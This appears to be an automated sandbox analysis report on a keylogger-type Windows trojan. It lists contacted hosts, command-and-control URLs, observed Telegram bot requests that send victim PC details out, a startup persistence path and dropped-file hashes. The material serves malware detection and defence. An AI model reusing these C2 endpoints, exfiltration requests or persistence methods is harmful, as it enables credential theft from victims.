                  Source | Detection | Scanner | Label
                  http://mail.acadental.com | 100% | Avira URL Cloud | malware
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  mail.acadental.com | 3.130.71.34 | true | true | | unknown
                  s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
                  reallyfreegeoip.org | 104.21.32.1 | true | false | | high
                  api.telegram.org | 149.154.167.220 | true | false | | high
                  checkip.dyndns.com | 193.122.6.168 | true | false | | high
                  checkip.dyndns.org | unknown | unknown | false | | high
                  Name | Malicious | Antivirus Detection | Reputation
                  https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:34:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2011:35:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                  http://checkip.dyndns.org/ | false | | high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.office.com/RegSvcs.exe, 00000007.00000002.3794762480.000000000348C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
URL | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20a | RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/lB | RegSvcs.exe, 00000003.00000002.3795172591.0000000003415000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003487000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 00000007.00000002.3794762480.000000000345B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://varders.kozow.com:8081 | enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://mail.acadental.com | RegSvcs.exe, 00000003.00000002.3795172591.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003435000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://aborters.duckdns.org:8081 | enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://51.38.247.67:8081/_send_.php?L | RegSvcs.exe, 00000003.00000002.3795172591.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003435000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://anotherarmy.dns.army:8081 | enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/q | enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=enlB | RegSvcs.exe, 00000003.00000002.3795172591.00000000033E4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003456000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | RegSvcs.exe, 00000003.00000002.3795172591.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000339E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003359000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | RegSvcs.exe, 00000003.00000002.3795172591.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000339E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000332E000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.32.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
3.130.71.34 | mail.acadental.com | United States | 16509 | AMAZON-02US | true
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588893
Start date and time: 2025-01-11 06:48:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ty1nyFUMlo.exe
renamed because original name is a hash value
Original Sample Name: e71789b9c70a2b9bbe541baf50d4e222be0d1b1cc2b38be925c01d9169158bf5.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@10/6@4/4
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 50
• Number of non-executed functions: 309
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RegSvcs.exe, PID 7496 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
00:49:10 | API Interceptor | 13345861x Sleep call for process: RegSvcs.exe modified
05:49:11 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | sS7Jrsk0Z7.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger |
149.154.167.220 | lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | 5qJ6QQTcRS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger |
149.154.167.220 | 4NG0guPiKA.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
149.154.167.220 | njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer |
149.154.167.220 | YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
149.154.167.220 | 6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | 4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT |
104.21.32.1 | BalphRTkPS.exe | malicious | FormBook | www.aziziyeescortg.xyz/2pcx/
104.21.32.1 | 25IvlOVEB1.exe | malicious | FormBook | www.masterqq.pro/3vdc/
104.21.32.1 | QUOTATION#050125.exe | malicious | FormBook | www.mzkd6gp5.top/3u0p/
104.21.32.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | redroomaudio.com/administrator/index.php
3.130.71.34 | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger |
3.130.71.34 | Nuevo pedido de cotización 663837 4899272.pdf.exe | malicious | Snake Keylogger, VIP Keylogger |
193.122.6.168 | prgNb8YFEA.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | fpIGwanLZi.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | 6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | h1HIe1rt4D.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | 2NJzy3tiny.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | czHx16QwGQ.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | xXUnP7uCBJ.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | ajRZflJ2ch.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | sS7Jrsk0Z7.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 104.21.64.1
reallyfreegeoip.org | 3qr7JBuNuX.exe | malicious | MassLogger RAT | 104.21.16.1
reallyfreegeoip.org | lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
reallyfreegeoip.org | 5qJ6QQTcRS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 104.21.112.1
reallyfreegeoip.org | prgNb8YFEA.exe | malicious | Snake Keylogger | 104.21.112.1
reallyfreegeoip.org | rlPy5vt1Dg.exe | malicious | MassLogger RAT | 104.21.48.1
reallyfreegeoip.org | wZ6VEnOkie.exe | malicious | Snake Keylogger | 104.21.80.1
reallyfreegeoip.org | prlsqnzspl.exe | malicious | MassLogger RAT | 104.21.48.1
reallyfreegeoip.org | dZMT94YYwO.exe | malicious | MassLogger RAT | 104.21.16.1
reallyfreegeoip.org | tNXl4XhgmV.exe | malicious | MassLogger RAT | 104.21.48.1
mail.acadental.com | RubzLi27lr.exe | malicious | Snake Keylogger, VIP Keylogger | 3.130.71.34
mail.acadental.com | Nuevo pedido de cotización 663837 4899272.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 3.130.71.34
s-part-0017.t-0009.t-msedge.net | 1r3DRyrX0T.exe | malicious | DarkWatchman | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | TBUjHBNHaD.exe | malicious | DarkWatchman | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | S7s4XhcN1G.exe | malicious | DarkWatchman | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | 6043249381237528594.js | malicious | Strela Downloader |
                                                                                                                      • 13.107.246.45
                                                                                                                      247624346306918832.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      https://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      T1#U5b89#U88c5#U53051.0.1.msiGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      Xre0Nmqk09.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      22736232701915520651.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      53198678114324144.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      api.telegram.orgsS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      • 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: ORACLE-BMC-31898US
sS7Jrsk0Z7.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 158.101.44.242
3qr7JBuNuX.exe | malicious | MassLogger RAT | 158.101.44.242
lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
5qJ6QQTcRS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 158.101.44.242
prgNb8YFEA.exe | malicious | Snake Keylogger | 193.122.6.168
prlsqnzspl.exe | malicious | MassLogger RAT | 158.101.44.242
dZMT94YYwO.exe | malicious | MassLogger RAT | 193.122.130.0
fpIGwanLZi.exe | malicious | Snake Keylogger | 193.122.6.168
n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.130.0
njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer | 158.101.44.242

Match: TELEGRAMRU
sS7Jrsk0Z7.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 149.154.167.220
lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
5qJ6QQTcRS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 149.154.167.220
4NG0guPiKA.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
6BRa130JDj.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
4AMVusDMPP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220

Match: AMAZON-02US
plZuPtZoTk.exe | malicious | FormBook | 54.67.87.110
ARMV4L.elf | malicious | Unknown | 54.171.230.55
wSoShbuXnJ.exe | malicious | FormBook | 3.252.97.86
BLv4mI7zzY.exe | malicious | FormBook | 13.228.81.39
4.elf | malicious | Unknown | 18.131.143.241
ydJaT4b5N8.exe | malicious | FormBook | 13.248.169.48
BalphRTkPS.exe | malicious | FormBook | 18.139.62.226
n2pGr8w21V.exe | malicious | FormBook | 13.248.169.48
PGK60fNNCZ.exe | malicious | FormBook | 13.248.169.48
02Eh1ah35H.exe | malicious | FormBook, GuLoader | 76.223.54.146

Match: CLOUDFLARENETUS
962Zrwh5bU.exe | malicious | Azorult | 104.21.75.48
sS7Jrsk0Z7.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 104.21.64.1
3qr7JBuNuX.exe | malicious | MassLogger RAT | 104.21.16.1
lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
5qJ6QQTcRS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 104.21.112.1
https://mrohailkhan.com/energyaustralia/auth/auhs1/ | malicious | Unknown | 172.64.155.59
3.elf | malicious | Unknown | 1.1.1.1
prgNb8YFEA.exe | malicious | Snake Keylogger | 104.21.112.1
wSoShbuXnJ.exe | malicious | FormBook | 104.21.86.111
1507513743282749438.js | malicious | Strela Downloader | 162.159.61.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 54328bd36c14bd82ddaa0c04b25ed9ad
sS7Jrsk0Z7.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 104.21.32.1
3qr7JBuNuX.exe | malicious | MassLogger RAT | 104.21.32.1
lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.32.1
5qJ6QQTcRS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 104.21.32.1
prgNb8YFEA.exe | malicious | Snake Keylogger | 104.21.32.1
rlPy5vt1Dg.exe | malicious | MassLogger RAT | 104.21.32.1
wZ6VEnOkie.exe | malicious | Snake Keylogger | 104.21.32.1
prlsqnzspl.exe | malicious | MassLogger RAT | 104.21.32.1
dZMT94YYwO.exe | malicious | MassLogger RAT | 104.21.32.1
tNXl4XhgmV.exe | malicious | MassLogger RAT | 104.21.32.1

Match: 3b5074b1b5d032e5620f69f9f700ff0e
sS7Jrsk0Z7.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 149.154.167.220
lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
5qJ6QQTcRS.exe | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | 149.154.167.220
ZFCKpFXpzx.exe | malicious | Unknown | 149.154.167.220
ZFCKpFXpzx.exe | malicious | Unknown | 149.154.167.220
ZeAX5i7cGB.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
jKqPSehspS.exe | malicious | AgentTesla | 149.154.167.220
A6AHI7Uk18.exe | malicious | AgentTesla | 149.154.167.220
Wru9ycO2MJ.exe | malicious | AgentTesla | 149.154.167.220
iNFGd6bDZX.exe | malicious | AgentTesla | 149.154.167.220

No context
Process: C:\Users\user\Desktop\ty1nyFUMlo.exe
File Type: data
Category: dropped
Size (bytes): 118126
Entropy (8bit): 7.904723583054281
Encrypted: false
SSDEEP: 3072:Ms2tL2KWNuJ6HghnFNEbssZe6bkzcvTwLBxMbX+:z6RrPBEbFbkzcvTwtxMbX+
MD5: 4A589F39EB65BBB31A3849BB8B241C46
SHA1: AF734C5F747B63F29D1EFD4C98BAC90F9E925B97
SHA-256: A94043B7A7D971133CDA4AAB26B1F23F91396E7D6AC36111578E3A453DC4CA32
SHA-512: 0C3E499A976B23439924211120CD62353968604FAF4388C96C8882AAC585867A581CEDCC689254B19453B091798DF81FB18C7A31D3540C3CAF9CECE332E14EFD
Malicious: false
Reputation: low
Process: C:\Users\user\AppData\Local\translucently\enterogenous.exe
File Type: data
Category: dropped
Size (bytes): 118126
Entropy (8bit): 7.904723583054281
Encrypted: false
SSDEEP: 3072:Ms2tL2KWNuJ6HghnFNEbssZe6bkzcvTwLBxMbX+:z6RrPBEbFbkzcvTwtxMbX+
MD5: 4A589F39EB65BBB31A3849BB8B241C46
SHA1: AF734C5F747B63F29D1EFD4C98BAC90F9E925B97
SHA-256: A94043B7A7D971133CDA4AAB26B1F23F91396E7D6AC36111578E3A453DC4CA32
SHA-512: 0C3E499A976B23439924211120CD62353968604FAF4388C96C8882AAC585867A581CEDCC689254B19453B091798DF81FB18C7A31D3540C3CAF9CECE332E14EFD
Malicious: false
Reputation: low
